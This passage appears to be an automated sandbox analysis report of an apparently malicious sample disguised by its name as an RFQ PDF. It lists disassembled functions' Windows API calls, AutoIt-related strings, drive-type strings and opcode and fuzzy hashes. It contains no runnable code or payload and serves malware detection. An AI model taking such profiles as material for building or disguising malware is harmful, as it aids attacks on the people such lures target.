                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 764f6e000794b13900539d99a70e420586710b7e539b16adc810130c5869feee
                                                                                                                • Instruction ID: c3cffc7ae53c82fcd3ed1158e5b608c66cf4c02c7fd0213de7f82f0b5fa9b057
                                                                                                                • Opcode Fuzzy Hash: 764f6e000794b13900539d99a70e420586710b7e539b16adc810130c5869feee
                                                                                                                • Instruction Fuzzy Hash: 94618B71628709D7DF388B288951BBF23B8DF4274CF200D5AE943DB281EA16DD468B55
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8152a31f44e554275ed6af8f18d42a5e3a75c8cf1e1a9ed1063ee02296805730
                                                                                                                • Instruction ID: e78224b39d4f638aa99c9729ed22e23e222f80c74ea991e94ce61a3263e41e61
                                                                                                                • Opcode Fuzzy Hash: 8152a31f44e554275ed6af8f18d42a5e3a75c8cf1e1a9ed1063ee02296805730
                                                                                                                • Instruction Fuzzy Hash: 11417FEB94FBC15FF7079734586A145BF24AC2312935D46DFC8808A98BD3D24089C79B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 274e11d1bd62d345773d684dcbe061017f923b91e3a5768be1b1d88cc2c16095
                                                                                                                • Instruction ID: 3b1987d281e252d0f9a130f97768d1b304238fea92c0baf5aad8b2a2a325e536
                                                                                                                • Opcode Fuzzy Hash: 274e11d1bd62d345773d684dcbe061017f923b91e3a5768be1b1d88cc2c16095
                                                                                                                • Instruction Fuzzy Hash: 2821BB326205158BD728CF79C8136BE73E9A754310F55862EE4A7C37D1DE35AD04C740
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AC2B30
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AC2B43
                                                                                                                • DestroyWindow.USER32 ref: 00AC2B52
                                                                                                                • GetDesktopWindow.USER32 ref: 00AC2B6D
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AC2B74
                                                                                                                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00AC2CA3
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00AC2CB1
                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2CF8
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00AC2D04
                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AC2D40
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2D62
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2D75
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2D80
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00AC2D89
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2D98
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00AC2DA1
                                                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2DA8
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00AC2DB3
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2DC5
                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00ADFC38,00000000), ref: 00AC2DDB
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00AC2DEB
                                                                                                                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00AC2E11
                                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00AC2E30
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC2E52
                                                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AC303F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                • API String ID: 2211948467-2373415609
                                                                                                                APIs
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00AD712F
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00AD7160
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00AD716C
                                                                                                                • SetBkColor.GDI32(?,000000FF), ref: 00AD7186
                                                                                                                • SelectObject.GDI32(?,?), ref: 00AD7195
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00AD71C0
                                                                                                                • GetSysColor.USER32(00000010), ref: 00AD71C8
                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00AD71CF
                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 00AD71DE
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AD71E5
                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00AD7230
                                                                                                                • FillRect.USER32(?,?,?), ref: 00AD7262
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD7284
                                                                                                                  • Part of subcall function 00AD73E8: GetSysColor.USER32(00000012), ref: 00AD7421
                                                                                                                  • Part of subcall function 00AD73E8: SetTextColor.GDI32(?,?), ref: 00AD7425
                                                                                                                  • Part of subcall function 00AD73E8: GetSysColorBrush.USER32(0000000F), ref: 00AD743B
                                                                                                                  • Part of subcall function 00AD73E8: GetSysColor.USER32(0000000F), ref: 00AD7446
                                                                                                                  • Part of subcall function 00AD73E8: GetSysColor.USER32(00000011), ref: 00AD7463
                                                                                                                  • Part of subcall function 00AD73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AD7471
                                                                                                                  • Part of subcall function 00AD73E8: SelectObject.GDI32(?,00000000), ref: 00AD7482
                                                                                                                  • Part of subcall function 00AD73E8: SetBkColor.GDI32(?,00000000), ref: 00AD748B
                                                                                                                  • Part of subcall function 00AD73E8: SelectObject.GDI32(?,?), ref: 00AD7498
                                                                                                                  • Part of subcall function 00AD73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00AD74B7
                                                                                                                  • Part of subcall function 00AD73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AD74CE
                                                                                                                  • Part of subcall function 00AD73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00AD74DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 4124339563-0
                                                                                                                • Opcode ID: 7aff75f14cd36c7f979ea634e3311afd376adb326a2ae770284127e45a623e24
                                                                                                                • Instruction ID: 31c396efa43d7c1a58e1a6531b8a8b8650a4f1a85a70233188d44b48a10c9c8b
                                                                                                                • Opcode Fuzzy Hash: 7aff75f14cd36c7f979ea634e3311afd376adb326a2ae770284127e45a623e24
                                                                                                                • Instruction Fuzzy Hash: 87A18E72009312AFDB04DFA0DC48A6EBBA9FB49331F500B1AF963961E1E771E945CB51
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(00000000), ref: 00AC273E
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AC286A
                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00AC28A9
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00AC28B9
                                                                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00AC2900
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00AC290C
                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00AC2955
                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AC2964
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00AC2974
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00AC2978
                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00AC2988
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AC2991
                                                                                                                • DeleteDC.GDI32(00000000), ref: 00AC299A
                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AC29C6
                                                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00AC29DD
                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00AC2A1D
                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AC2A31
                                                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00AC2A42
                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00AC2A77
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00AC2A82
                                                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AC2A8D
                                                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00AC2A97
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                • Opcode ID: d1635dcb0b950b56481cd47c789b2e6302668bfb5e3031b32248a4b00683c2a6
                                                                                                                • Instruction ID: 71d3c45ca3d31da6f09b3de6512683a6cc5c3a4c9d7698904b2055e14dfa19ed
                                                                                                                • Opcode Fuzzy Hash: d1635dcb0b950b56481cd47c789b2e6302668bfb5e3031b32248a4b00683c2a6
                                                                                                                • Instruction Fuzzy Hash: 75B16D75A00215AFEB10DFA8DD85FAE7BB9EB44710F408519FA15E7290DB70ED00CB64
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00AB4AED
                                                                                                                • GetDriveTypeW.KERNEL32(?,00ADCB68,?,\\.\,00ADCC08), ref: 00AB4BCA
                                                                                                                • SetErrorMode.KERNEL32(00000000,00ADCB68,?,\\.\,00ADCC08), ref: 00AB4D36
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                • API String ID: 2907320926-4222207086
                                                                                                                • Opcode ID: 2ec410fb8a5766f41114d657b2ed55c7e30941a601d337a9e2feca19856fc21d
                                                                                                                • Instruction ID: 0628170e5e30959aedae3f73260eda1007e98bd49ccf3a3cc510fdf8b51567d1
                                                                                                                • Opcode Fuzzy Hash: 2ec410fb8a5766f41114d657b2ed55c7e30941a601d337a9e2feca19856fc21d
                                                                                                                • Instruction Fuzzy Hash: 9D61B1306051069BCB14DF24CA829FD7FF8EB4EB04B208565F806AB6A3DB31ED55EB41
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000012), ref: 00AD7421
                                                                                                                • SetTextColor.GDI32(?,?), ref: 00AD7425
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00AD743B
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00AD7446
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00AD744B
                                                                                                                • GetSysColor.USER32(00000011), ref: 00AD7463
                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AD7471
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00AD7482
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 00AD748B
                                                                                                                • SelectObject.GDI32(?,?), ref: 00AD7498
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00AD74B7
                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AD74CE
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00AD74DB
                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AD752A
                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00AD7554
                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00AD7572
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 00AD757D
                                                                                                                • GetSysColor.USER32(00000011), ref: 00AD758E
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00AD7596
                                                                                                                • DrawTextW.USER32(?,00AD70F5,000000FF,?,00000000), ref: 00AD75A8
                                                                                                                • SelectObject.GDI32(?,?), ref: 00AD75BF
                                                                                                                • DeleteObject.GDI32(?), ref: 00AD75CA
                                                                                                                • SelectObject.GDI32(?,?), ref: 00AD75D0
                                                                                                                • DeleteObject.GDI32(?), ref: 00AD75D5
                                                                                                                • SetTextColor.GDI32(?,?), ref: 00AD75DB
                                                                                                                • SetBkColor.GDI32(?,?), ref: 00AD75E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 1996641542-0
                                                                                                                • Opcode ID: 477f27aec34c05c252a80ad0aa63d3887cf1026d8ce78e6c5de82b8a652e252b
                                                                                                                • Instruction ID: e218c231e912a854db926cad7681f52eb19b23ec364e9647e20eff3d70330970
                                                                                                                • Opcode Fuzzy Hash: 477f27aec34c05c252a80ad0aa63d3887cf1026d8ce78e6c5de82b8a652e252b
                                                                                                                • Instruction Fuzzy Hash: 7C615072901219AFDF05DFA4DC49EEEBF79FB08320F114216F916AB2A1E7749941CB90
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 00AD1128
                                                                                                                • GetDesktopWindow.USER32 ref: 00AD113D
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AD1144
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD1199
                                                                                                                • DestroyWindow.USER32(?), ref: 00AD11B9
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AD11ED
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AD120B
                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AD121D
                                                                                                                • SendMessageW.USER32(00000000,00000421,?,?), ref: 00AD1232
                                                                                                                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00AD1245
                                                                                                                • IsWindowVisible.USER32(00000000), ref: 00AD12A1
                                                                                                                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00AD12BC
                                                                                                                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00AD12D0
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00AD12E8
                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00AD130E
                                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 00AD1328
                                                                                                                • CopyRect.USER32(?,?), ref: 00AD133F
                                                                                                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 00AD13AA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                • String ID: ($0$tooltips_class32
                                                                                                                • API String ID: 698492251-4156429822
                                                                                                                • Opcode ID: 9441cc93359fea2d79786d0fda1c16e8bef52450fc29851078c810fb2f94fb63
                                                                                                                • Instruction ID: cbbbaadd70d06a1bea0883fee1ef262cd665400ac23ff03b411612c455cfd20b
                                                                                                                • Opcode Fuzzy Hash: 9441cc93359fea2d79786d0fda1c16e8bef52450fc29851078c810fb2f94fb63
                                                                                                                • Instruction Fuzzy Hash: 17B17B71608341AFD704DF64C984B6BBBE4FF84350F40891EF99A9B2A1C731E845CBA2
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00AD02E5
                                                                                                                • _wcslen.LIBCMT ref: 00AD031F
                                                                                                                • _wcslen.LIBCMT ref: 00AD0389
                                                                                                                • _wcslen.LIBCMT ref: 00AD03F1
                                                                                                                • _wcslen.LIBCMT ref: 00AD0475
                                                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AD04C5
                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AD0504
                                                                                                                  • Part of subcall function 00A5F9F2: _wcslen.LIBCMT ref: 00A5F9FD
                                                                                                                  • Part of subcall function 00AA223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AA2258
                                                                                                                  • Part of subcall function 00AA223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AA228A
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                • API String ID: 1103490817-719923060
                                                                                                                • Opcode ID: 45083dff191a6605b79ceb3b4911080ba38d33e6229788e09cc7cb128a8e3811
                                                                                                                • Instruction ID: 3a08c816d0a66f635e56d3989608f79cf969e65ab3f4d322dab261716c4ed9d1
                                                                                                                • Opcode Fuzzy Hash: 45083dff191a6605b79ceb3b4911080ba38d33e6229788e09cc7cb128a8e3811
                                                                                                                • Instruction Fuzzy Hash: 57E16A316082019BC714DF28CA51E2AB7E6BFD8714F14496EF8979B3A1DB30ED45CB92
                                                                                                                APIs
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A58968
                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00A58970
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A5899B
                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00A589A3
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00A589C8
                                                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A589E5
                                                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A589F5
                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A58A28
                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A58A3C
                                                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 00A58A5A
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00A58A76
                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A58A81
                                                                                                                  • Part of subcall function 00A5912D: GetCursorPos.USER32(?), ref: 00A59141
                                                                                                                  • Part of subcall function 00A5912D: ScreenToClient.USER32(00000000,?), ref: 00A5915E
                                                                                                                  • Part of subcall function 00A5912D: GetAsyncKeyState.USER32(00000001), ref: 00A59183
                                                                                                                  • Part of subcall function 00A5912D: GetAsyncKeyState.USER32(00000002), ref: 00A5919D
                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,00A590FC), ref: 00A58AA8
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                • API String ID: 1458621304-248962490
                                                                                                                • Opcode ID: 6e0478b7f28725b47cdc4411e0f932f220057813bcfaf0746b36708429f5c2cc
                                                                                                                • Instruction ID: d9bd950d6d30e3f60a41a45dd0edace2af72281254d22282841f4315c783cf6a
                                                                                                                • Opcode Fuzzy Hash: 6e0478b7f28725b47cdc4411e0f932f220057813bcfaf0746b36708429f5c2cc
                                                                                                                • Instruction Fuzzy Hash: 36B15C31A0120ADFDF14DFA8DD45BEE3BB5FB48365F50861AFA16A7290DB34A841CB50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AA1114
